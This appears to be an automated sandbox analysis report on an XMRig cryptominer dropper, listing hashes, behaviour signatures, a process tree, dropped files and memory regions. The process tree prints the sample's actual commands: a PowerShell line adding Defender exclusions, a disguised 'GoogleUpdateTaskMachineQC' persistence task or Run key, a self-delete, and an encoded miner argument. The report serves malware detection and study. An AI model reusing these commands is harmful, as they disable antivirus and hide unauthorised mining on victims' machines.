Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1799s
  • max time network
    1785s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/UU4Ddwqm5zcuLzGR.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3528
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2640
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1940
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\UU4Ddwqm5zcuLzGR.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2108
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:4204
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:4960
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:2228
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1184
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:2876
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2812
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3048
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3312
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:4432
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic PATH Win32_VideoController GET Name, VideoProcessor
                3⤵
                • Detects videocard installed
                PID:1048
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            1⤵
            • Drops file in Program Files directory
            PID:3560

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            252KB

            MD5

            0f5d455f2546cbd48ef3ad15b10ce838

            SHA1

            8fc38161a5ad7811cb3e93a756b04ab1090d1628

            SHA256

            27b9510eb57be28227e2b2a343c0f38519b51e3110182f9c1121c1b2f81a21b9

            SHA512

            866da522fad6285c98fcb1c8e4d398190f7d2e8d44a5907614bbd39d465ff14a693ceb5902a73a57583cb87dd27feeb13789be9ce0989a3532ead8dbaa081206

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            d28a889fd956d5cb3accfbaf1143eb6f

            SHA1

            157ba54b365341f8ff06707d996b3635da8446f7

            SHA256

            21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

            SHA512

            0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            3d5d1c9f4c47c9402135d1675c11f61c

            SHA1

            d88aa2af5a10890665f2eb2f28abdd7f5ca1c279

            SHA256

            31b7a441e52dee7761a064d741fd3a4f97eaf864ee1f178f460e6be89296d2cd

            SHA512

            f6d1d09ca6025daa21998ccb46165046e1558f6bcd1c2155489a6e41559398865669b62605c9f7700eb16022a1728939e34b95d414ba06cdfc3d4e656ff6fc1e

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gpfshtaz.bes.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/1184-75-0x0000025CE5890000-0x0000025CE58A0000-memory.dmp
            Filesize

            64KB

          • memory/1184-77-0x0000025CFEC60000-0x0000025CFEC6A000-memory.dmp
            Filesize

            40KB

          • memory/1184-84-0x0000025CE5890000-0x0000025CE58A0000-memory.dmp
            Filesize

            64KB

          • memory/1184-83-0x0000025CFEE00000-0x0000025CFEE0A000-memory.dmp
            Filesize

            40KB

          • memory/1184-80-0x0000025CFEE10000-0x0000025CFEE2A000-memory.dmp
            Filesize

            104KB

          • memory/1184-81-0x0000025CFEDC0000-0x0000025CFEDC8000-memory.dmp
            Filesize

            32KB

          • memory/1184-82-0x0000025CFEDF0000-0x0000025CFEDF6000-memory.dmp
            Filesize

            24KB

          • memory/1184-79-0x0000025CFEDB0000-0x0000025CFEDBA000-memory.dmp
            Filesize

            40KB

          • memory/1184-78-0x0000025CFEDD0000-0x0000025CFEDEC000-memory.dmp
            Filesize

            112KB

          • memory/1184-87-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/1184-76-0x0000025CFEBA0000-0x0000025CFEC55000-memory.dmp
            Filesize

            724KB

          • memory/1184-74-0x00007FF43CB70000-0x00007FF43CB80000-memory.dmp
            Filesize

            64KB

          • memory/1184-61-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/1184-62-0x0000025CE5890000-0x0000025CE58A0000-memory.dmp
            Filesize

            64KB

          • memory/1184-63-0x0000025CE5890000-0x0000025CE58A0000-memory.dmp
            Filesize

            64KB

          • memory/1184-73-0x0000025CFEB80000-0x0000025CFEB9C000-memory.dmp
            Filesize

            112KB

          • memory/1940-29-0x000001AC6F090000-0x000001AC6F0A0000-memory.dmp
            Filesize

            64KB

          • memory/1940-28-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/1940-32-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/1940-30-0x000001AC6F090000-0x000001AC6F0A0000-memory.dmp
            Filesize

            64KB

          • memory/2640-1-0x000001A11E9E0000-0x000001A11EA02000-memory.dmp
            Filesize

            136KB

          • memory/2640-11-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/2640-12-0x000001A1370D0000-0x000001A1370E0000-memory.dmp
            Filesize

            64KB

          • memory/2640-13-0x000001A1370D0000-0x000001A1370E0000-memory.dmp
            Filesize

            64KB

          • memory/2640-16-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/2812-124-0x00007FF7D8BD0000-0x00007FF7D8BE6000-memory.dmp
            Filesize

            88KB

          • memory/2812-131-0x00007FF7D8BD0000-0x00007FF7D8BE6000-memory.dmp
            Filesize

            88KB

          • memory/2876-100-0x000002B9FEF90000-0x000002B9FEFA0000-memory.dmp
            Filesize

            64KB

          • memory/2876-111-0x000002B9FEF90000-0x000002B9FEFA0000-memory.dmp
            Filesize

            64KB

          • memory/2876-113-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/2876-99-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/2876-101-0x000002B9FEF90000-0x000002B9FEFA0000-memory.dmp
            Filesize

            64KB

          • memory/3048-138-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-184-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-186-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-142-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-144-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-182-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-122-0x000001CA2CFA0000-0x000001CA2CFC0000-memory.dmp
            Filesize

            128KB

          • memory/3048-121-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-123-0x000001CA2D580000-0x000001CA2D5A0000-memory.dmp
            Filesize

            128KB

          • memory/3048-180-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-125-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-126-0x000001CA2D5A0000-0x000001CA2D5C0000-memory.dmp
            Filesize

            128KB

          • memory/3048-128-0x000001CA2D5C0000-0x000001CA2D5E0000-memory.dmp
            Filesize

            128KB

          • memory/3048-129-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-130-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-178-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-132-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-146-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-135-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-136-0x000001CA2D5C0000-0x000001CA2D5E0000-memory.dmp
            Filesize

            128KB

          • memory/3048-176-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-140-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-174-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-172-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-133-0x000001CA2D5A0000-0x000001CA2D5C0000-memory.dmp
            Filesize

            128KB

          • memory/3048-148-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-150-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-152-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-154-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-156-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-158-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-160-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-162-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-164-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-166-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-168-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3048-170-0x00007FF64AE70000-0x00007FF64B664000-memory.dmp
            Filesize

            8.0MB

          • memory/3312-51-0x00007FF62EB20000-0x00007FF62ED31000-memory.dmp
            Filesize

            2.1MB

          • memory/3312-120-0x00007FF62EB20000-0x00007FF62ED31000-memory.dmp
            Filesize

            2.1MB

          • memory/3768-0-0x00007FF6303A0000-0x00007FF6305B1000-memory.dmp
            Filesize

            2.1MB

          • memory/3768-34-0x00007FF6303A0000-0x00007FF6305B1000-memory.dmp
            Filesize

            2.1MB

          • memory/4960-50-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/4960-40-0x00007FFD37BD0000-0x00007FFD38691000-memory.dmp
            Filesize

            10.8MB

          • memory/4960-46-0x000001D79DE20000-0x000001D79DE30000-memory.dmp
            Filesize

            64KB

          • memory/4960-41-0x000001D79DE20000-0x000001D79DE30000-memory.dmp
            Filesize

            64KB